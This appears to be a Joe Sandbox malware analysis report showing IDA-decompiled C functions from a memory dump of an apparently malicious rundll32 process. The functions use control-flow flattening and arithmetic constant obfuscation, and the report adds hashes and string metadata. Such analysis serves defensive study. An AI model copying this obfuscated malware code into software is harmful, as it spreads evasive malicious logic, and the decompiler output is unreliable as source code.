				_v84 = _v84 ^ 0x0146fab0;
				_v40 = 0xc24;
				_v40 = _v40 + 0xffffa127;
				_v40 = _v40 | 0x3c999bfc;
				_v40 = _v40 ^ 0xffffb592;
				_v16 = 0x74b4;
				_v16 = _v16 ^ 0x64626fff;
				_v16 = _v16 ^ 0x646231f2;
				while(1) {
					L1:
					_t232 = 0x1bfacda6;
					while(1) {
						L2:
						_t254 = 0x3332e500;
						do {
							L3:
							while(_t284 != 0x3797d51) {
								if(_t284 == 0xd3e1028) {
									E0029753A(_v80, _v52,  *((intOrPtr*)(_t283 + 0x2c)), _v56, _v84);
									_t288 =  &(_t288[3]);
									_t284 = 0x1efdcaf8;
									while(1) {
										L1:
										_t232 = 0x1bfacda6;
										L2:
										_t254 = 0x3332e500;
										goto L3;
									}
								}
								if(_t284 == _t232) {
									_t235 = E002A063C(_v60, _v88, _t254, _v64, E0029884A, _v20, _t254, _t283, _t254, _t254, _v24);
									_t288 =  &(_t288[9]);
									 *((intOrPtr*)(_t283 + 0x14)) = _t235;
									__eflags = _t235;
									_t254 = 0x3332e500;
									_t232 = 0x1bfacda6;
									_t284 =  !=  ? 0x3332e500 : 0xd3e1028;
									continue;
								}
								if(_t284 == 0x1efdcaf8) {
									return E0029EF80(_v40, _t283, _v16);
								}
								if(_t284 != 0x2b544fa7) {
									if(_t284 == 0x30403f1a) {
										_t242 = E002A76B9(_v72,  *((intOrPtr*)(_t283 + 0x2c)), _v36, _v96);
										_t288 =  &(_t288[2]);
										 *((intOrPtr*)(_t283 + 0x18)) = _t242;
										__eflags = _t242;
										_t232 = 0x1bfacda6;
										_t284 =  !=  ? 0x1bfacda6 : 0xd3e1028;
										goto L2;
									} else {
										if(_t284 == _t254) {
											 *((intOrPtr*)(_t283 + 0x1c)) = _t287;
											_t243 =  *0x2b0718; // 0x0
											 *((intOrPtr*)(_t283 + 8)) = _t243;
											 *0x2b0718 = _t283;
											return _t243;
										}
										goto L19;
									}
									L22:
									return _t241;
								}
								_push(_t254);
								_push(_t254);
								_t241 = E002A9E2B(0x38);
								_t283 = _t241;
								_t288 =  &(_t288[3]);
								__eflags = _t283;
								if(__eflags != 0) {
									_t284 = 0x3797d51;
									while(1) {
										L1:
										_t232 = 0x1bfacda6;
										goto L2;
									}
								}
								goto L22;
							}
							_push(_v48);
							_t233 = E002959B8(_v44, _v76, _t283, _t287, __eflags, _t254,  *((intOrPtr*)(_t244 + 4)),  *_t244);
							_t288 =  &(_t288[4]);
							 *((intOrPtr*)(_t283 + 0x2c)) = _t233;
							__eflags = _t233;
							if(__eflags == 0) {
								_t284 = 0x1efdcaf8;
								_t232 = 0x1bfacda6;
								_t254 = 0x3332e500;
								goto L19;
							} else {
								_t284 = 0x30403f1a;
								goto L1;
							}
							goto L22;
							L19:
							__eflags = _t284 - 0x1a15e16d;
						} while (__eflags != 0);
						return _t232;
					}
				}
			}

0x00296342
0x00296345
0x0029634d
0x00296359
0x0029635b
0x0029635d
0x00296363
0x0029636b
0x00296371
0x00296378
0x0029637d
0x00296383
0x0029638b
0x00296397
0x0029639c
0x002963a2
0x002963aa
0x002963b2
0x002963ba
0x002963c2
0x002963c7
0x002963cf
0x002963d7
0x002963e4
0x002963e7
0x002963eb
0x002963f3
0x002963fb
0x00296408
0x0029640c
0x00296414
0x0029641c
0x00296421
0x0029642d
0x00296432
0x00296438
0x00296440
0x00296448
0x00296455
0x00296456
0x0029645a
0x00296462
0x0029646a
0x0029646f
0x00296477
0x0029647f
0x00296487
0x0029648f
0x00296497
0x0029649f
0x002964a4
0x002964b1
0x002964b5
0x002964bd
0x002964c5
0x002964d3
0x002964d9
0x002964e1
0x002964ef
0x002964f4
0x002964fa
0x00296502
0x0029650a
0x00296512
0x00296517
0x0029651f
0x00296527
0x00296533
0x00296538
0x0029653e
0x00296546
0x00296553
0x00296554
0x00296558
0x00296560
0x0029656d
0x00296571
0x00296579
0x0029657e
0x00296586
0x0029658e
0x00296593
0x0029659b
0x002965a3
0x002965ab
0x002965b9
0x002965bd
0x002965c5
0x002965d2
0x002965d6
0x002965db
0x002965e3
0x002965eb
0x002965f3
0x002965fb
0x00296603
0x0029660b
0x00296613
0x0029661b
0x00296623
0x00296623
0x00296623
0x00296628
0x00296628
0x00296628
0x0029662d
0x00000000
0x0029662d
0x0029663f
0x0029673a
0x0029673f
0x00296742
0x00296623
0x00296623
0x00296623
0x00296628
0x00296628
0x00000000
0x00296628
0x00296623
0x00296647
0x00296703
0x00296708
0x0029670b
0x0029670e
0x00296715
0x0029671a
0x0029671f
0x00000000
0x0029671f
0x00296653
0x00000000
0x002967a3
0x0029665f
0x00296667
0x00296696
0x0029669b
0x0029669e
0x002966a1
0x002966a8
0x002966ad
0x00000000
0x00296669
0x0029666b
0x00296671
0x00296674
0x00296679
0x0029667c
0x00000000
0x0029667c
0x00000000
0x0029666b
0x002967ab
0x002967ab
0x002967ab
0x002966c5
0x002966c6
0x002966c9
0x002966ce
0x002966d0
0x002966d3
0x002966d5
0x002966db
0x00296623
0x00296623
0x00296623
0x00000000
0x00296623
0x00296623
0x00000000
0x002966d5
0x0029674c
0x0029675e
0x00296763
0x00296766
0x00296769
0x0029676b
0x00296777
0x0029677c
0x00296781
0x00000000
0x0029676d
0x0029676d
0x00000000
0x0029676d
0x00000000
0x00296786
0x00296786
0x00296786
0x00000000
0x0029662d
0x00296628

Strings

Bp, xrefs: 002965A3
bN, xrefs: 0029653E
D_, xrefs: 002964BD
+!, xrefs: 002963AA
! , xrefs: 00296487

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ! $+!$Bp$D_$bN
API String ID: 0-800964769
Opcode ID: 86e19d3833be7e15baf12ac54f787f57c3043903c56d40b9524f3ddc78b18008
Instruction ID: 50ef51159c076b485b8a443bf15605bb2d4e6b7bd775fde0a9323fea5badb886
Opcode Fuzzy Hash: 86e19d3833be7e15baf12ac54f787f57c3043903c56d40b9524f3ddc78b18008
Instruction Fuzzy Hash: 1AB155B29183419FD748CF25C88990BFBF2BBC5348F108A1DF5959A2A0D7B5C958CF82

Uniqueness

Uniqueness Score: -1.00%

Function 0029D668, Relevance: 6.4, Strings: 5, Instructions: 181
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E0029D668(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				void* _t164;
				intOrPtr* _t183;
				void* _t185;
				void* _t197;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t201;
				signed int* _t204;

				_t183 = _a12;
				_push(_a20);
				_push(_a16);
				_push(_t183);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0029E171(_t164);
				_v4 = _v4 & 0x00000000;
				_t204 =  &(( &_v72)[7]);
				_v8 = 0x53e138;
				_v40 = 0x80a8;
				_t197 = 0;
				_v40 = _v40 ^ 0x479697d0;
				_t185 = 0x2a79b9cd;
				_v40 = _v40 + 0xffff1a14;
				_v40 = _v40 ^ 0x4795262f;
				_v56 = 0x4d2b;
				_v56 = _v56 << 1;
				_v56 = _v56 ^ 0x75104092;
				_t198 = 0x65;
				_v56 = _v56 * 0x3f;
				_v56 = _v56 ^ 0xcf25f769;
				_v60 = 0xaeaa;
				_v60 = _v60 + 0xea29;
				_v60 = _v60 | 0xfb8605f4;
				_v60 = _v60 ^ 0xf88e7530;
				_v60 = _v60 ^ 0x0309f479;
				_v64 = 0x2bfb;
				_v64 = _v64 >> 5;
				_v64 = _v64 + 0x1d78;
				_v64 = _v64 | 0x1f5c2f35;
				_v64 = _v64 ^ 0x1f5c669e;
				_v68 = 0xde63;
				_v68 = _v68 ^ 0x9a434763;
				_v68 = _v68 + 0xdeb8;
				_v68 = _v68 / _t198;
				_v68 = _v68 ^ 0x0187248d;
				_v72 = 0x77fc;
				_v72 = _v72 >> 6;
				_v72 = _v72 * 0x1b;
				_v72 = _v72 << 9;
				_v72 = _v72 ^ 0x00651f1b;
				_v20 = 0x45cd;
				_v20 = _v20 | 0x3e821fd4;
				_v20 = _v20 ^ 0x3e827345;
				_v48 = 0xf526;
				_v48 = _v48 * 0x7f;
				_v48 = _v48 + 0x1d9d;
				_v48 = _v48 + 0x2091;
				_v48 = _v48 ^ 0x0079e027;
				_v24 = 0xf668;
				_v24 = _v24 ^ 0x84882b2a;
				_v24 = _v24 ^ 0x8488b759;
				_v52 = 0x639e;
				_v52 = _v52 >> 0xa;
				_v52 = _v52 + 0xffffb961;
				_v52 = _v52 + 0xffffd511;
				_v52 = _v52 ^ 0xffffdc7d;
				_v12 = 0x1264;
				_v12 = _v12 >> 3;
				_v12 = _v12 ^ 0x000072bf;
				_v44 = 0xd4c4;
				_v44 = _v44 + 0xffff76e0;
				_v44 = _v44 >> 3;
				_v44 = _v44 << 2;
				_v44 = _v44 ^ 0x000026a9;
				_v16 = 0xea64;
				_v16 = _v16 << 0xf;
				_v16 = _v16 ^ 0x753209ee;
				_v28 = 0x1594;
				_v28 = _v28 + 0xb7d7;
				_v28 = _v28 << 3;
				_v28 = _v28 ^ 0x00062bdb;
				_v32 = 0x183e;
				_t199 = 0x34;
				_v32 = _v32 / _t199;
				_t200 = 3;
				_t201 = _v12;
				_v32 = _v32 / _t200;
				_v32 = _v32 ^ 0x000043fb;
				_v36 = 0x65be;
				_v36 = _v36 << 0xa;
				_v36 = _v36 >> 4;
				_v36 = _v36 ^ 0x0019225e;
				while(_t185 != 0xa549ca5) {
					if(_t185 == 0x2795ab78) {
						_push(_t185);
						_push(_t185);
						_t197 = E002A9E2B(_t201);
						_t204 =  &(_t204[3]);
						if(_t197 != 0) {
							_t185 = 0xa549ca5;
							continue;
						}
					} else {
						if(_t185 == 0x2a79b9cd) {
							_t185 = 0x337bab1b;
							continue;
						} else {
							if(_t185 != 0x337bab1b) {
								L13:
								if(_t185 != 0x10206f3e) {
									continue;
								}
							} else {
								_t201 = E00293873(0, _v40, 0, _v56, _t185, _v60, _v64, _v68, _v72, _a20, _t185, _a4, _t185, _a8);
								_t204 =  &(_t204[0xc]);
								if(_t201 != 0) {
									_t185 = 0x2795ab78;
									continue;
								}
							}
						}
					}
					return _t197;
				}
				E00293873(_t197, _v12, _t201, _v44, _t185, _v16, _v28, _v32, _v36, _a20, _t185, _a4, _t185, _a8);
				_t204 =  &(_t204[0xc]);
				if(_t183 != 0) {
					 *_t183 = _t201;
				}
				_t185 = 0x10206f3e;
				goto L13;
			}

0x0029d66c
0x0029d673
0x0029d677
0x0029d67b
0x0029d67c
0x0029d680
0x0029d684
0x0029d685
0x0029d686
0x0029d68b
0x0029d690
0x0029d693
0x0029d69d
0x0029d6a5
0x0029d6a7
0x0029d6af
0x0029d6b4
0x0029d6bc
0x0029d6c4
0x0029d6cc
0x0029d6d0
0x0029d6df
0x0029d6e0
0x0029d6e4
0x0029d6ec
0x0029d6f4
0x0029d6fc
0x0029d704
0x0029d70c
0x0029d714
0x0029d71c
0x0029d721
0x0029d729
0x0029d731
0x0029d739
0x0029d741
0x0029d749
0x0029d757
0x0029d75b
0x0029d763
0x0029d76b
0x0029d775
0x0029d779
0x0029d77e
0x0029d786
0x0029d78e
0x0029d796
0x0029d79e
0x0029d7ab
0x0029d7af
0x0029d7b7
0x0029d7bf
0x0029d7c7
0x0029d7cf
0x0029d7d7
0x0029d7df
0x0029d7e7
0x0029d7ec
0x0029d7f4
0x0029d7fc
0x0029d804
0x0029d80c
0x0029d811
0x0029d819
0x0029d821
0x0029d829
0x0029d82e
0x0029d833
0x0029d83b
0x0029d843
0x0029d848
0x0029d852
0x0029d85f
0x0029d867
0x0029d86c
0x0029d874
0x0029d882
0x0029d887
0x0029d891
0x0029d894
0x0029d898
0x0029d89c
0x0029d8a4
0x0029d8ac
0x0029d8b1
0x0029d8b6
0x0029d8be
0x0029d8cc
0x0029d939
0x0029d93a
0x0029d941
0x0029d943
0x0029d948
0x0029d94a
0x00000000
0x0029d94a
0x0029d8ce
0x0029d8d4
0x0029d922
0x00000000
0x0029d8d6
0x0029d8dc
0x0029d98e
0x0029d994
0x00000000
0x00000000
0x0029d8e2
0x0029d912
0x0029d914
0x0029d919
0x0029d91b
0x00000000
0x0029d91b
0x0029d919
0x0029d8dc
0x0029d8d4
0x0029d9a3
0x0029d9a3
0x0029d97b
0x0029d980
0x0029d985
0x0029d987
0x0029d987
0x0029d989
0x00000000

Strings

+M, xrefs: 0029D6C4
2u, xrefs: 0029D848
), xrefs: 0029D6F4
8S, xrefs: 0029D693
'y, xrefs: 0029D7BF

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 'y$)$+M$8S$2u
API String ID: 0-3801018270
Opcode ID: 38aa05666d057f33031c91a00bc7359a0bab127a475fce181e41c963b7c51dbb
Instruction ID: 648354c8a865a64e865c0808782ea65463612ebfcce4f2be95295b5c62d744f0
Opcode Fuzzy Hash: 38aa05666d057f33031c91a00bc7359a0bab127a475fce181e41c963b7c51dbb
Instruction Fuzzy Hash: 8E8143724183419FE754DF61C88941BBBF1FBC8758F004A0DF69696260D3B59A18CF83

Uniqueness

Uniqueness Score: -1.00%

Function 0029B7F8, Relevance: 6.4, Strings: 5, Instructions: 172
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E0029B7F8() {
				char _v524;
				signed int _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				short* _t167;
				void* _t169;
				void* _t175;
				intOrPtr _t182;
				signed int _t204;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				signed int _t213;
				void* _t215;

				_t215 = (_t213 & 0xfffffff8) - 0x258;
				_v528 = _v528 & 0x00000000;
				_v536 = 0x6d1405;
				_t175 = 0x1ce635c6;
				_v532 = 0x29b6bb;
				_v576 = 0xa8ac;
				_v576 = _v576 ^ 0x76f7902c;
				_v576 = _v576 + 0x4f2e;
				_v576 = _v576 ^ 0x76f7f3c7;
				_v568 = 0x6f1b;
				_v568 = _v568 | 0x170f9d39;
				_v568 = _v568 ^ 0x86cada1d;
				_v568 = _v568 ^ 0x91c52d69;
				_v560 = 0x624;
				_v560 = _v560 ^ 0xb68429cb;
				_t204 = 0x7f;
				_v560 = _v560 / _t204;
				_v560 = _v560 ^ 0x016fdf5e;
				_v592 = 0x5f46;
				_v592 = _v592 << 0xa;
				_t205 = 0x51;
				_v592 = _v592 * 0x57;
				_v592 = _v592 >> 5;
				_v592 = _v592 ^ 0x040c669b;
				_v572 = 0x6972;
				_v572 = _v572 >> 4;
				_v572 = _v572 >> 2;
				_v572 = _v572 ^ 0x00002d05;
				_v584 = 0x9cd5;
				_v584 = _v584 ^ 0xcc4d316a;
				_v584 = _v584 + 0x8950;
				_v584 = _v584 ^ 0xf53b7d27;
				_v584 = _v584 ^ 0x3975710e;
				_v552 = 0xbc2c;
				_v552 = _v552 | 0xdc666a97;
				_v552 = _v552 ^ 0xdc669f6e;
				_v588 = 0xf214;
				_v588 = _v588 / _t205;
				_t206 = 0x18;
				_v588 = _v588 / _t206;
				_v588 = _v588 + 0xc6e9;
				_v588 = _v588 ^ 0x00009494;
				_v596 = 0xd5f2;
				_v596 = _v596 | 0xfc1dee36;
				_v596 = _v596 ^ 0xe7108454;
				_v596 = _v596 << 9;
				_v596 = _v596 ^ 0x1af777ad;
				_v600 = 0x5502;
				_v600 = _v600 >> 9;
				_v600 = _v600 | 0x978329f7;
				_v600 = _v600 + 0xffff1717;
				_v600 = _v600 ^ 0x97821e9b;
				_v564 = 0xc117;
				_v564 = _v564 | 0x469e39c3;
				_v564 = _v564 ^ 0x95552159;
				_v564 = _v564 ^ 0xd3cb8f59;
				_v540 = 0x80d1;
				_v540 = _v540 >> 1;
				_v540 = _v540 ^ 0x00000744;
				_v544 = 0xc52f;
				_t207 = 0x7b;
				_v544 = _v544 / _t207;
				_v544 = _v544 ^ 0x00004c53;
				_v580 = 0xf92a;
				_v580 = _v580 ^ 0x77c5b38c;
				_v580 = _v580 + 0x222;
				_v580 = _v580 >> 1;
				_v580 = _v580 ^ 0x3be2ef21;
				_v556 = 0x82cf;
				_v556 = _v556 + 0xffff6dbc;
				_v556 = _v556 * 0x2a;
				_v556 = _v556 ^ 0xfffd011e;
				_v548 = 0x71c3;
				_v548 = _v548 ^ 0x5a9b7de7;
				_v548 = _v548 ^ 0x5a9b4b0f;
				do {
					while(_t175 != 0x4858010) {
						if(_t175 == 0x1918070b) {
							_t167 = E0029C8A5(_v580,  &_v524, _v556, _v548, E002AD08F,  &_v524, 0);
						} else {
							if(_t175 == 0x1ce635c6) {
								_t175 = 0x241b1bce;
								continue;
							} else {
								_t221 = _t175 - 0x241b1bce;
								if(_t175 != 0x241b1bce) {
									goto L8;
								} else {
									_push(_v560);
									_push(_v568);
									_t169 = E00296ABA(_v576, 0x2af800, _t221);
									_t182 =  *0x2b0724; // 0x340cf0
									E0029F882(_t221, _t169, _v592, _v572, _v584, _v552, _t182 + 0x238,  &_v524);
									_t215 = _t215 + 0x24;
									_t167 = E0029F935(_v588, _t169, _v596, _v600);
									_t175 = 0x4858010;
									continue;
								}
							}
						}
						L11:
						return _t167;
					}
					_t167 = E002A2089(_v564, _v540, _v544,  &_v524);
					__eflags = 0;
					 *_t167 = 0;
					_t175 = 0x1918070b;
					L8:
					__eflags = _t175 - 0x11d0bfbf;
				} while (__eflags != 0);
				goto L11;
			}

0x0029b7fe
0x0029b804
0x0029b80b
0x0029b813
0x0029b818
0x0029b820
0x0029b828
0x0029b830
0x0029b838
0x0029b840
0x0029b848
0x0029b850
0x0029b858
0x0029b860
0x0029b868
0x0029b87a
0x0029b87f
0x0029b885
0x0029b88d
0x0029b895
0x0029b89f
0x0029b8a2
0x0029b8a6
0x0029b8ab
0x0029b8b3
0x0029b8bb
0x0029b8c0
0x0029b8c5
0x0029b8cd
0x0029b8d5
0x0029b8dd
0x0029b8e5
0x0029b8ed
0x0029b8f5
0x0029b8fd
0x0029b905
0x0029b90d
0x0029b91d
0x0029b925
0x0029b92a
0x0029b930
0x0029b938
0x0029b940
0x0029b948
0x0029b950
0x0029b958
0x0029b95d
0x0029b965
0x0029b96d
0x0029b972
0x0029b97a
0x0029b982
0x0029b98a
0x0029b992
0x0029b99a
0x0029b9a2
0x0029b9aa
0x0029b9b2
0x0029b9b6
0x0029b9be
0x0029b9ca
0x0029b9cd
0x0029b9d6
0x0029b9e3
0x0029b9f0
0x0029b9f8
0x0029ba00
0x0029ba04
0x0029ba0c
0x0029ba14
0x0029ba21
0x0029ba25
0x0029ba2d
0x0029ba35
0x0029ba3d
0x0029ba45
0x0029ba45
0x0029ba4f
0x0029bb18
0x0029ba55
0x0029ba5b
0x0029baca
0x00000000
0x0029ba5d
0x0029ba5d
0x0029ba5f
0x00000000
0x0029ba65
0x0029ba65
0x0029ba6e
0x0029ba76
0x0029ba7b
0x0029baa6
0x0029baab
0x0029babc
0x0029bac3
0x00000000
0x0029bac3
0x0029ba5f
0x0029ba5b
0x0029bb20
0x0029bb27
0x0029bb27
0x0029bae2
0x0029bae9
0x0029baeb
0x0029baee
0x0029baf0
0x0029baf0
0x0029baf0
0x00000000

Strings

.O, xrefs: 0029B830
ri, xrefs: 0029B8B3
F_, xrefs: 0029B88D
!;, xrefs: 0029BA04
SL, xrefs: 0029B9D6

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !;$.O$F_$SL$ri
API String ID: 0-1528691979
Opcode ID: 8d5a4d4cd5bf7403fabd3e7d7635527c6d1ac87ace8d0c0a31e06f0fb8c07182
Instruction ID: 0380f5fb103183e42ff9664bb6c1835485b6d7df791f98b0473757b8db948a9f
Opcode Fuzzy Hash: 8d5a4d4cd5bf7403fabd3e7d7635527c6d1ac87ace8d0c0a31e06f0fb8c07182
Instruction Fuzzy Hash: DA8151711183409FD358CF21D98A81FBBF1FBC8758F108A1DF18A962A0C7B59A59CF46

Uniqueness

Uniqueness Score: -1.00%

Function 002ACBB0, Relevance: 6.4, Strings: 5, Instructions: 126
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E002ACBB0(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v4;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				void* _t120;
				intOrPtr _t122;
				intOrPtr _t133;
				signed int _t134;
				signed int _t135;
				intOrPtr _t139;
				intOrPtr _t140;
				intOrPtr _t152;
				intOrPtr* _t153;
				void* _t154;
				intOrPtr _t155;

				_v8 = _v8 & 0x00000000;
				_v4 = _v4 & 0x00000000;
				_v16 = 0x3f573f;
				_v12 = 0x28bff7;
				_v32 = 0xf6f8;
				_v32 = _v32 + 0xffff0ae4;
				_v32 = _v32 ^ 0x0000741e;
				_v56 = 0xb7fb;
				_v56 = _v56 + 0xfffff01f;
				_v56 = _v56 ^ 0x5c2a1c61;
				_v56 = _v56 ^ 0x5c2adb68;
				_v60 = 0x9f6c;
				_v60 = _v60 ^ 0x03150f05;
				_v60 = _v60 | 0x45bbd529;
				_v60 = _v60 + 0x3144;
				_v60 = _v60 ^ 0x47c07da1;
				_v48 = 0x5e52;
				_v48 = _v48 | 0x724b1708;
				_v48 = _v48 + 0x6c65;
				_v48 = _v48 ^ 0x724ba047;
				_v52 = 0x2041;
				_v52 = _v52 | 0x6fdf95dc;
				_v52 = _v52 + 0xffffb60e;
				_v52 = _v52 ^ 0x6fdf4c2c;
				_v36 = 0x5820;
				_v36 = _v36 | 0x2f79794a;
				_v36 = _v36 >> 0xe;
				_v36 = _v36 ^ 0x000097bc;
				_v40 = 0x52df;
				_v40 = _v40 ^ 0xb23dfe95;
				_v40 = _v40 | 0x872ce1f7;
				_v40 = _v40 ^ 0xb73da89c;
				_v44 = 0x6af4;
				_v44 = _v44 + 0xffff26e8;
				_t134 = 0x72;
				_v44 = _v44 / _t134;
				_v44 = _v44 ^ 0x023ed37f;
				_v28 = 0xb8bf;
				_t135 = 6;
				_v28 = _v28 / _t135;
				_v28 = _v28 ^ 0x00006e86;
				_v20 = 0x86b5;
				_v20 = _v20 + 0xffff42b7;
				_v20 = _v20 ^ 0xffffc85c;
				_v24 = 0x8729;
				_v24 = _v24 << 4;
				_v24 = _v24 ^ 0x00083b6d;
				_t120 = E002A746E(_t135);
				_t152 = _a4;
				_t154 = _t120;
				_v56 = 0x8f1c;
				_v56 = _v56 + 0xffff2747;
				_v56 = _v56 | 0x9aae4419;
				_v56 = _v56 ^ 0xfffff67b;
				_t156 = _t152 + 0x24;
				_t133 = E002A8696(_v48, _t152 + 0x24, _v52);
				_t122 =  *((intOrPtr*)(_t152 + 8));
				if(_t122 != _v56 && _t122 != _t154) {
					_t139 =  *((intOrPtr*)(_t152 + 0x18));
					if(_t139 != _v56 && _t139 != _t154) {
						_t153 = _a8;
						_t140 =  *_t153;
						if(E002958D5(_t140, _t133) == 0) {
							_push(_t140);
							_push(_t140);
							_t155 = E002A9E2B(0x244);
							if(_t155 != 0) {
								_t110 = _t155 + 8; // 0x8
								E0029E056(_t156, _v20, _t110, _v24);
								 *((intOrPtr*)(_t155 + 0x224)) = _t133;
								 *((intOrPtr*)(_t155 + 0x218)) =  *_t153;
								 *_t153 = _t155;
							}
						}
					}
				}
				return 1;
			}

0x002acbb7
0x002acbbe
0x002acbc3
0x002acbcb
0x002acbd3
0x002acbdb
0x002acbe3
0x002acbeb
0x002acbf3
0x002acbfb
0x002acc03
0x002acc0b
0x002acc13
0x002acc1b
0x002acc23
0x002acc2b
0x002acc33
0x002acc3b
0x002acc43
0x002acc4b
0x002acc53
0x002acc5b
0x002acc63
0x002acc6b
0x002acc73
0x002acc7b
0x002acc83
0x002acc88
0x002acc90
0x002acc98
0x002acca0
0x002acca8
0x002accb0
0x002accb8
0x002accc6
0x002acccb
0x002accd1
0x002accd9
0x002acce5
0x002acce8
0x002accec
0x002accf4
0x002accfc
0x002acd04
0x002acd0c
0x002acd14
0x002acd19
0x002acd29
0x002acd2e
0x002acd32
0x002acd34
0x002acd3c
0x002acd44
0x002acd4c
0x002acd54
0x002acd69
0x002acd6b
0x002acd74
0x002acd7a
0x002acd81
0x002acd87
0x002acd8d
0x002acd96
0x002acda8
0x002acda9
0x002acdb4
0x002acdbb
0x002acdc1
0x002acdcb
0x002acdd0
0x002acdd9
0x002acde0
0x002acde0
0x002acdbb
0x002acd96
0x002acd81
0x002acdec

Strings

A , xrefs: 002ACC53
el, xrefs: 002ACC43
Jyy/, xrefs: 002ACC7B
D1, xrefs: 002ACC23
?W?, xrefs: 002ACBC3

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ?W?$A $D1$Jyy/$el
API String ID: 0-1906289488
Opcode ID: ec746dcd56928d4dc6bd066512465a5455984ac2340cf2aec4a54fbf106f7a57
Instruction ID: dce2ce7bbb50030115d051d3cd93c2684feaf163faaf8c44e2ce6c0c60fc9d23
Opcode Fuzzy Hash: ec746dcd56928d4dc6bd066512465a5455984ac2340cf2aec4a54fbf106f7a57
Instruction Fuzzy Hash: 925134B11097429FD354DF25D58A50BBBE0FB88B18F204A1CF4C9962A0DBB5DA19CF86

Uniqueness

Uniqueness Score: -1.00%

Function 0029D2CE, Relevance: 6.4, Strings: 5, Instructions: 112
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0029D2CE() {
				char _v520;
				signed int _v524;
				intOrPtr _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				char* _t93;
				void* _t96;
				signed int _t110;
				short* _t113;
				signed int* _t115;

				_t115 =  &_v564;
				_v524 = _v524 & 0x00000000;
				_v528 = 0x75d39b;
				_t96 = 0x2de47e49;
				_v544 = 0xc3e4;
				_v544 = _v544 + 0xffff43da;
				_v544 = _v544 + 0xb1de;
				_v544 = _v544 ^ 0x0000ad22;
				_v548 = 0x726a;
				_v548 = _v548 ^ 0xbf339715;
				_v548 = _v548 + 0xfffff3ec;
				_v548 = _v548 ^ 0xbf33e53d;
				_v532 = 0x22f8;
				_v532 = _v532 ^ 0xac150c49;
				_v532 = _v532 ^ 0xac154c62;
				_v560 = 0xa2e;
				_v560 = _v560 >> 6;
				_v560 = _v560 ^ 0xb5f4e6bd;
				_t110 = 0x2d;
				_v560 = _v560 / _t110;
				_v560 = _v560 ^ 0x040b2a07;
				_v536 = 0x1000;
				_v536 = _v536 * 0x70;
				_v536 = _v536 ^ 0x00072656;
				_v552 = 0x57a1;
				_v552 = _v552 >> 1;
				_v552 = _v552 << 5;
				_v552 = _v552 ^ 0x00056765;
				_v556 = 0xa6ac;
				_v556 = _v556 * 0x57;
				_v556 = _v556 >> 5;
				_v556 = _v556 + 0xffffa03f;
				_v556 = _v556 ^ 0x000147dc;
				_v540 = 0x2ae7;
				_v540 = _v540 << 9;
				_v540 = _v540 ^ 0x0055c5da;
				do {
					while(_t96 != 0xfa0b558) {
						if(_t96 == 0x10833494) {
							return E0029E056(_t113, _v556,  *0x2b0724, _v540);
						}
						if(_t96 == 0x246781c5) {
							_t93 = E0029DD94(_v544,  &_v520, __eflags, _t96, _v548, _v532);
							_t115 =  &(_t115[3]);
							_t96 = 0xfa0b558;
							continue;
						}
						if(_t96 != 0x2de47e49) {
							goto L15;
						}
						_t96 = 0x246781c5;
					}
					_v564 = 0xbbb9;
					_v564 = _v564 * 0x4e;
					_v564 = _v564 | 0xbfabbbfe;
					_v564 = _v564 ^ 0xbfbbbbfc;
					_t113 =  &_v520 + E0029C7EA(_v560, _v536,  &_v520, _v552) * 2;
